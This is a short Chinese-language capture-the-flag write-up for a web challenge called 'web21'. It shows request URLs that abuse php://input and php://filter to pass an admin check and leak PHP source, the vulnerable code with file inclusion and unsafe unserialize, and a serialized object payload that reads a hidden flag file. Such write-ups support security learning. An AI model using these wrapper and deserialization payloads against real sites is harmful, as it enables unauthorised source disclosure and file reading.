web21
F12看一下
看了一下,应该是代码审计的题,使用php伪协议,进行post 以及文件包含漏洞。
http://123.206.31.85:10021/?user=php://input&file=php://filter/read=convert.base64-encode/resource=index.php
爆出了index.php源码
在这里插入代码片<?php
error_reporting(E_ALL & ~E_NOTICE);
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="admin")){
echo "hello admin!<br>";
if(preg_match("/f1a9/",$file)){
exit();
}else{
include($file); //class.php
$pass = unserialize($pass);
echo $pass;
}
}else{
echo "you are not admin ! ";
}
?>
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="admin")){
echo "hello admin!<br>";
include($file); //class.php
}else{
echo "you are not admin ! ";
}
-->
http://123.206.31.85:10021/?user=php://input&file=php://filter/read=convert.base64-encode/resource=class.php
同理,再去爆一下class.php的源码
<?php
error_reporting(E_ALL & ~E_NOTICE);
class Read{//f1a9.php
public $file;
public function __toString(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
return "__toString was called!";
}
}
?>
于是我们构造一下序列化read
提交即可得到flag
$pass=O:4:“Read”:1:{s:4:“file”;s:8:“f1a9.php”;}